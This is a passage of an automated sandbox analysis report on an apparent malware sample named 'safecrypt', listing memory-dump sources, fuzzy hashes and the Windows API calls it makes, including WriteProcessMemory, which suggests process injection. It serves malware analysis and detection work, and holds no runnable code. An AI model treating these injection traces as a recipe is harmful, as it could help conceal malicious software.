                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: 8a0cdac0080417db277899794cfd63dbe2429346801c8ef87e9ec42bdefde83b
                    • Instruction ID: 6245e6003100a4bacba5e001dc34a5ce672391c187dd9cda56e297ebb716a2e8
                    • Opcode Fuzzy Hash: 8a0cdac0080417db277899794cfd63dbe2429346801c8ef87e9ec42bdefde83b
                    • Instruction Fuzzy Hash: F5313731E2C6C6EDFB2DB7618C12B793255BB83701F04979DE50BB9081EEB40A07C916
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: Open
                    • String ID:
                    • API String ID: 71445658-0
                    • Opcode ID: 7013abfe96adcce5707ab82630f18204e182155a70321e584d08f785f950927b
                    • Instruction ID: db82e4cf5755ace44d68654ddeeeb2f5eb5ce54075372a76ca664b70ff0f08c5
                    • Opcode Fuzzy Hash: 7013abfe96adcce5707ab82630f18204e182155a70321e584d08f785f950927b
                    • Instruction Fuzzy Hash: 6931353299C542FDEB1E76B18D12A3D7946EB82745F04DF2DD043A6052ED31090FCAA6
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateFileW.KERNELBASE(?,00000000,398A9A0F), ref: 02681114
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: 282981bc8be1fdd28aeaaddc6f11a103794a354364ab08f14370f2deee634856
                    • Instruction ID: f7d150206203d4f28589598ba3c41b1aa4675a86c3d0c0967ebfe43d763b0f25
                    • Opcode Fuzzy Hash: 282981bc8be1fdd28aeaaddc6f11a103794a354364ab08f14370f2deee634856
                    • Instruction Fuzzy Hash: C7314671D282C5EDFB2DB7614C02B793649FB83701F04978CE10BB9081EEB40607C915
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: Open
                    • String ID:
                    • API String ID: 71445658-0
                    • Opcode ID: 4f6be46e81c59d9b536364f6f0626e577d1a83cb315d6d293aaa5c9019b950c3
                    • Instruction ID: 737a87d9a7b110c958e1c2aaab68f79bdb53e64f9b2cbe48d8225b890b1c6f96
                    • Opcode Fuzzy Hash: 4f6be46e81c59d9b536364f6f0626e577d1a83cb315d6d293aaa5c9019b950c3
                    • Instruction Fuzzy Hash: 0731563299C541FDEB1E73B18D12A3D7A46EB42315F049F6DD043A7052ED21090FCAA7
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateFileW.KERNELBASE(?,00000000,398A9A0F), ref: 02681114
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: 9c1f7e909fd3eea8a8a6f6b19e39fb1135c319c9b7c8841bc970084fcdb5188f
                    • Instruction ID: db8731f260769e191f47183ec3b2db942cd232d04735ed15ef88fa09d1a21daa
                    • Opcode Fuzzy Hash: 9c1f7e909fd3eea8a8a6f6b19e39fb1135c319c9b7c8841bc970084fcdb5188f
                    • Instruction Fuzzy Hash: C2313675D282D6EDFB2EB7314C02B793655BB83706F04979DE10BB9081EEB40647C916
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateFileW.KERNELBASE(?,00000000,398A9A0F), ref: 02681114
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: 5a38f640a3c8a1dd13314036b4660e7b20149f41f2e0013dbe6fa994cc312140
                    • Instruction ID: c024d9d1ac37af6e995efbf5e452979393dc90a6bd4711250f1572bc07eafd4c
                    • Opcode Fuzzy Hash: 5a38f640a3c8a1dd13314036b4660e7b20149f41f2e0013dbe6fa994cc312140
                    • Instruction Fuzzy Hash: 8F313431D185519EEB2DBB308C11B7D76AABB82701F0097DDE04EB6180EE740B438E56
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02681DFF
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: MemoryProcessWrite
                    • String ID:
                    • API String ID: 3559483778-0
                    • Opcode ID: 0f781015eee9def8cba4f67d4cabd7fb6a662d9d90dd8ca40c510e634fc99889
                    • Instruction ID: d659429bdfe7b4ec4f7f23e120cb48ef0934c801a5195bb20e54d1b4d2f83b5b
                    • Opcode Fuzzy Hash: 0f781015eee9def8cba4f67d4cabd7fb6a662d9d90dd8ca40c510e634fc99889
                    • Instruction Fuzzy Hash: 75212837929912AEFB1E73614C19E3A359ABB83B05F445B9DE00BD9182FEB80503C5A5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: a893d6afd5c6605f07021a134821f30031c9c8260e14392896996136f05ef476
                    • Instruction ID: 701abdf780bf836ca37b362952e5389b70d29ffbe4a6c52b22121961fe780c70
                    • Opcode Fuzzy Hash: a893d6afd5c6605f07021a134821f30031c9c8260e14392896996136f05ef476
                    • Instruction Fuzzy Hash: F8213575D281D5E9FB2DB7714C02B79365AAB83702F04A78CE10BB9081EEB806478956
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02681DFF
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: MemoryProcessWrite
                    • String ID:
                    • API String ID: 3559483778-0
                    • Opcode ID: ec60615dc82382a16c526ca4507f80c62e857d2befcbf524650c4a297530c541
                    • Instruction ID: f127a4ffbd4deaa59b5be7307ad71f14d359059d4f0238a532fa0575103d7f90
                    • Opcode Fuzzy Hash: ec60615dc82382a16c526ca4507f80c62e857d2befcbf524650c4a297530c541
                    • Instruction Fuzzy Hash: 7E213A27529912EEFB1F73718C09E3E399ABB83705B045BDCA00BD8182FEB44107C5A6
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: f3c78511967c2744fde6c4839ab72bb6babc845e987d3e7224732e9e23122f51
                    • Instruction ID: 362bc9833a9c88a7178f052865353145aa67fec323ceec2ee270309b4872e5d7
                    • Opcode Fuzzy Hash: f3c78511967c2744fde6c4839ab72bb6babc845e987d3e7224732e9e23122f51
                    • Instruction Fuzzy Hash: 12213375E282D5DDFB2DB7718C02B79365ABB83701F00A78DE10BB9080EEB40A438916
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • RegOpenKeyExA.KERNELBASE(00000000), ref: 0268052E
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: Open
                    • String ID:
                    • API String ID: 71445658-0
                    • Opcode ID: 3c1ba6bca0e52ceb032f011902d76427b7c64e49df4b63d3e16b7c7641189c15
                    • Instruction ID: 97744ebe1275433e3b387c077f10924507075d1d27bcb494e974c793a870ff5a
                    • Opcode Fuzzy Hash: 3c1ba6bca0e52ceb032f011902d76427b7c64e49df4b63d3e16b7c7641189c15
                    • Instruction Fuzzy Hash: DB21383199C501EDEB1EB7B58D12A3D7986AB81705F04DF2CD043A7162EE35490FC962
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: 775552311efc997a64fec326de64f70a324eb551f3d610af4de481991e4e8b11
                    • Instruction ID: c1ade35fd70736ac765d1957b3199303c82c356327f03c5cf2566ce75e6cb9fa
                    • Opcode Fuzzy Hash: 775552311efc997a64fec326de64f70a324eb551f3d610af4de481991e4e8b11
                    • Instruction Fuzzy Hash: CC212375D282D9DAEB2DB7718C42BBD3255AB83B01F00A79DE11BB90C1EEB406438915
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02681DFF
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: MemoryProcessWrite
                    • String ID:
                    • API String ID: 3559483778-0
                    • Opcode ID: f9ac679f8e0cf96fba6a3b70f6f95253f646b93b79c71b8e224950455c4c086d
                    • Instruction ID: 003222a4e1eea93ab4246a46ab47e1cc55420d72e98cef145cedc2460baa0cf4
                    • Opcode Fuzzy Hash: f9ac679f8e0cf96fba6a3b70f6f95253f646b93b79c71b8e224950455c4c086d
                    • Instruction Fuzzy Hash: FC113B33919512AEFB2E73614C19E3E355ABF83B01F445B9DA00BC9141EEF80603C5A6
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: Open
                    • String ID:
                    • API String ID: 71445658-0
                    • Opcode ID: 8df296da8f6b82597c51bad57296300d3f639d263cfdb22ec6c07efedeb0fda6
                    • Instruction ID: 140ee3c5d39e2959f7ea124e9fc956bcb651af22c41e2ff2208d22ee27c8115b
                    • Opcode Fuzzy Hash: 8df296da8f6b82597c51bad57296300d3f639d263cfdb22ec6c07efedeb0fda6
                    • Instruction Fuzzy Hash: 9B115E3199C502EDEB1E73B18D12A3D3946BB81709F04DF2CD043A7162EE25450FC967
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: 09400c0ad4820e84a7cc4df27e537323eb770c818cace0aa59f055add2827039
                    • Instruction ID: 191ffbaca6567bf611fa0a76125d3064c49c2a2abfd4aa0e3c9c34b7269b42a4
                    • Opcode Fuzzy Hash: 09400c0ad4820e84a7cc4df27e537323eb770c818cace0aa59f055add2827039
                    • Instruction Fuzzy Hash: 42213275D182D5DAEB2DB7718C42BB93255EB83701F00A79DE11BB90C0EEB40A43C916
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: Open
                    • String ID:
                    • API String ID: 71445658-0
                    • Opcode ID: 02a140002854169feed1287769ae2a2c964509509e6c2f63b64a68639a5e7125
                    • Instruction ID: febb4ca38b0b8290574c45dec7930b1204d27d19c98adf520f8261dcca8e508f
                    • Opcode Fuzzy Hash: 02a140002854169feed1287769ae2a2c964509509e6c2f63b64a68639a5e7125
                    • Instruction Fuzzy Hash: 2B117A21DAC542EDEB1EB3B18D12A3C3986AB42319F049F2CD003A7152DE254A0FC8A7
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • RegOpenKeyExA.KERNELBASE(00000000), ref: 0268052E
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: Open
                    • String ID:
                    • API String ID: 71445658-0
                    • Opcode ID: da1cf6185c91f5e603e61a7f6158a230a0e7f92a1f50f3dec993598b5eee6bac
                    • Instruction ID: f9d275c38a33c250756608990f824a54f53a58ad3cd3cfa53a86fd637972f440
                    • Opcode Fuzzy Hash: da1cf6185c91f5e603e61a7f6158a230a0e7f92a1f50f3dec993598b5eee6bac
                    • Instruction Fuzzy Hash: 3B114831A58511EEEB1A73B48D11A3D3D85AB8130CF048F2CE043D7192DE65490F8566
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: 21d50d2007dd92c12d20a00ee5866e89ac50f0f2d8dfbd3b29654133d477ed28
                    • Instruction ID: 8d363b1c23a8b7d103a1cf7eb7053e47c13bdb26888557362ed48f47ec7a7c21
                    • Opcode Fuzzy Hash: 21d50d2007dd92c12d20a00ee5866e89ac50f0f2d8dfbd3b29654133d477ed28
                    • Instruction Fuzzy Hash: DA115335D282CADAEB2DB7308C41BB97265FB83701F0093CDE10BB9080EE740A43C915
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02681DFF
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: MemoryProcessWrite
                    • String ID:
                    • API String ID: 3559483778-0
                    • Opcode ID: 77ef553066695ffda278322379b104e7957bc83d9acadbaf098a8393b9c1341f
                    • Instruction ID: 4e8d35146d2b9d35d9273e63b2499170a911e35684820b0712970038dd087772
                    • Opcode Fuzzy Hash: 77ef553066695ffda278322379b104e7957bc83d9acadbaf098a8393b9c1341f
                    • Instruction Fuzzy Hash: 441148335196169EEB2E73608C59A3E315ABF83B01F445BDDE00B89042DEF80503C9E6
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: 67c751a8b55108762c3cb0aac3f568bf76068b188bd76126e9ed6258c285c55b
                    • Instruction ID: 747b47131a092775c84e274ac6d7653d3f227efab83b25186b6766073fe9d78c
                    • Opcode Fuzzy Hash: 67c751a8b55108762c3cb0aac3f568bf76068b188bd76126e9ed6258c285c55b
                    • Instruction Fuzzy Hash: 08116635D281C6DEFB2CB3718C01A793296EB43705F00A79DE05BB9180EE7406038916
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • RegOpenKeyExA.KERNELBASE(00000000), ref: 0268052E
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: Open
                    • String ID:
                    • API String ID: 71445658-0
                    • Opcode ID: 3b93f74d504e587c04ad082dfd367b865e42af04cd8aa33fc555d962d3ba0892
                    • Instruction ID: 267181225f3d88e1128fa5a8f4356c3887d61ad508dbfd7378aedc7494e87530
                    • Opcode Fuzzy Hash: 3b93f74d504e587c04ad082dfd367b865e42af04cd8aa33fc555d962d3ba0892
                    • Instruction Fuzzy Hash: 5E01F721958912FDEF2E77714D11A3D398AAB81709F149F2CE403D6152EE260A0F8866
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: 77edb72f7f2b46ae724fd5b6712f3232ce1fcd22015516b3bb3acab835075a87
                    • Instruction ID: 5e2c6b452da04bffb35a3be6bfeaa644cd78906dc542a58b44bbaddfd88a755a
                    • Opcode Fuzzy Hash: 77edb72f7f2b46ae724fd5b6712f3232ce1fcd22015516b3bb3acab835075a87
                    • Instruction Fuzzy Hash: AE017B34D281C2DDFB2CB3719C41A393246FB83306B04A79CE05BB9181EF744603C81A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • RegOpenKeyExA.KERNELBASE(00000000), ref: 0268052E
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: Open
                    • String ID:
                    • API String ID: 71445658-0
                    • Opcode ID: a0f65059648f58c3f2ed2e57d5ce79987266beb213469c669ee73b0f4a9396d3
                    • Instruction ID: 4fa053b68cc895589009cc64d8f2a8b889c2920205bb95f2541a9af8f29c6821
                    • Opcode Fuzzy Hash: a0f65059648f58c3f2ed2e57d5ce79987266beb213469c669ee73b0f4a9396d3
                    • Instruction Fuzzy Hash: 4A012D21958452FDFB2B77754E1293D3E8ABB81319F149F1CD003D6152DE26060F8977
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateFileW.KERNELBASE(?,00000000,398A9A0F), ref: 02681114
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: 8f10755c4e3b35cd943f1f14528fd0ec8c7cb9d306b51c701a5feaff7733e221
                    • Instruction ID: 4ce7dd893565755d07992695dd40330d93e5574ff07fda379f135b36397f6d84
                    • Opcode Fuzzy Hash: 8f10755c4e3b35cd943f1f14528fd0ec8c7cb9d306b51c701a5feaff7733e221
                    • Instruction Fuzzy Hash: 60014771D2C2C5DDEB2DB3715C419393A55AB83305B04979DE09BB5182EE3446078616
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • RegOpenKeyExA.KERNELBASE(00000000), ref: 0268052E
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: Open
                    • String ID:
                    • API String ID: 71445658-0
                    • Opcode ID: 96162bf4c3a3e7afa834e70640d5b40bd64f996c8d8071937c8ec1f1f0623c18
                    • Instruction ID: 976efb1ffa390e56656419014db6d878c258560bc98ec1132c941d73700e53b5
                    • Opcode Fuzzy Hash: 96162bf4c3a3e7afa834e70640d5b40bd64f996c8d8071937c8ec1f1f0623c18
                    • Instruction Fuzzy Hash: 42F02B22958451FDFB2AB7B54E1297D3D8AAB82309B046F2CD003C7143DE15460F48BB
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • ReadFile.KERNELBASE(?,?,?,?,?), ref: 0268137C
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: FileRead
                    • String ID:
                    • API String ID: 2738559852-0
                    • Opcode ID: 5e3bdf8b89cadbb13794968bd025617baa750df5bc8ad8990af7e527a6b55562
                    • Instruction ID: 993492d9adbfec9c690d07e91265cf13b049be35ef667d26c6e267bedb1d4bb7
                    • Opcode Fuzzy Hash: 5e3bdf8b89cadbb13794968bd025617baa750df5bc8ad8990af7e527a6b55562
                    • Instruction Fuzzy Hash: E1F05928128542EFEF2A73700D02C393E4AFBD3309B28ABCC900B84942DE264607D45A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateFileW.KERNELBASE(?,00000000,398A9A0F), ref: 02681114
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: f3230fbf61f6e0d9014828d3481ba37165ae35ba5a217118e601344dbf9f54e3
                    • Instruction ID: 479a523d382bb715a652dcbe8b7822199b3a6d597857a97665c1181caa38b40c
                    • Opcode Fuzzy Hash: f3230fbf61f6e0d9014828d3481ba37165ae35ba5a217118e601344dbf9f54e3
                    • Instruction Fuzzy Hash: 29F02474E28591EDEF2DF7311C41C3D358AAB83B15B109B8CE00BE5181FE3946078816
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • RegOpenKeyExA.KERNELBASE(00000000), ref: 0268052E
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: Open
                    • String ID:
                    • API String ID: 71445658-0
                    • Opcode ID: baf21cfd23433194dd69e73abd46c16f2c74aefdaf863e3f807c3351c79a3420
                    • Instruction ID: 51bf60f20bac7b0fbcc6ccc11035f238295ff2b2292564562f91b84c8e604d27
                    • Opcode Fuzzy Hash: baf21cfd23433194dd69e73abd46c16f2c74aefdaf863e3f807c3351c79a3420
                    • Instruction Fuzzy Hash: 33F02762948421BCBF2AB7B54E1267D3D8FAB81309B006F2CD013D7152CE250A0F48BB
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateFileW.KERNELBASE(?,00000000,398A9A0F), ref: 02681114
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: ffe739957d8aee659d93a4557b79e1840c92414a55c47c2ea4f43bc571cfae4e
                    • Instruction ID: bd4fa9d0f8ae03244aa1a0c2dcb969aa13ec633b5bcff4e7bc2539b8cf199c0f
                    • Opcode Fuzzy Hash: ffe739957d8aee659d93a4557b79e1840c92414a55c47c2ea4f43bc571cfae4e
                    • Instruction Fuzzy Hash: FFF02E69D380C2D9EF2DF3725D0147D36466BC3359714978CD04BA01C1EE394607C817
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • ReadFile.KERNELBASE(?,?,?,?,?), ref: 0268137C
                    • FindCloseChangeNotification.KERNELBASE ref: 02681419
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: ChangeCloseFileFindNotificationRead
                    • String ID:
                    • API String ID: 1200561807-0
                    • Opcode ID: afa07cb496a8da912f676ae3c1371ff864dc80503d938838de9e54581c4dde44
                    • Instruction ID: fc495ccc9c9a6947acece0f866fbd471509059118150ccc7e6b0b0eddf5b5d41
                    • Opcode Fuzzy Hash: afa07cb496a8da912f676ae3c1371ff864dc80503d938838de9e54581c4dde44
                    • Instruction Fuzzy Hash: 5BF02219528941EFEF2EB3B11E13C3A3D4EFB83705308ABCC9007C8A43DD6A460B945A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • ReadFile.KERNELBASE(?,?,?,?,?), ref: 0268137C
                    • FindCloseChangeNotification.KERNELBASE ref: 02681419
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: ChangeCloseFileFindNotificationRead
                    • String ID:
                    • API String ID: 1200561807-0
                    • Opcode ID: 8d7be45794c9a5e24aa98d82897472a35a5572ac2451a5782ead3191aff66ef7
                    • Instruction ID: c4b4e0580b8ab49a267d7988a05f0d5091ed0815079dc46e5f7dbb995cf9917f
                    • Opcode Fuzzy Hash: 8d7be45794c9a5e24aa98d82897472a35a5572ac2451a5782ead3191aff66ef7
                    • Instruction Fuzzy Hash: B2E0DF69528940AEAF2AB3B11E1283E3D4FBB83705314ABCD810788542CD6A4A07985A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateFileW.KERNELBASE(?,00000000,398A9A0F), ref: 02681114
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: d04169a8507aa7b32e6d37faf1dc935d4416816b03ff0f492e5d5591e96265b0
                    • Instruction ID: a870df2d5a8212fe1cfc98cc3d0e43dd2e3daa3fa8d539e29dd78d9e74c5861b
                    • Opcode Fuzzy Hash: d04169a8507aa7b32e6d37faf1dc935d4416816b03ff0f492e5d5591e96265b0
                    • Instruction Fuzzy Hash: 2DE06869E28451D9EB2DF3721C0287E795A6FC3719304678CD007E01C1EE38830B8567
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • RegOpenKeyExA.KERNELBASE(00000000), ref: 0268052E
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: Open
                    • String ID:
                    • API String ID: 71445658-0
                    • Opcode ID: e0cf85a97bdfaefc5a75eed83a3704453fe5d3c179af08f2812745ba3dc88536
                    • Instruction ID: 2357febcb9a40acbde02e40a93ad17b03f7be3830384c399535a3ce5d1f1f4e5
                    • Opcode Fuzzy Hash: e0cf85a97bdfaefc5a75eed83a3704453fe5d3c179af08f2812745ba3dc88536
                    • Instruction Fuzzy Hash: 0CE0D8319045656DEF1ABAB48E1227C3A465B50305F105F3CC057971A2CE12460B08A7
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateFileW.KERNELBASE(?,00000000,398A9A0F), ref: 02681114
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
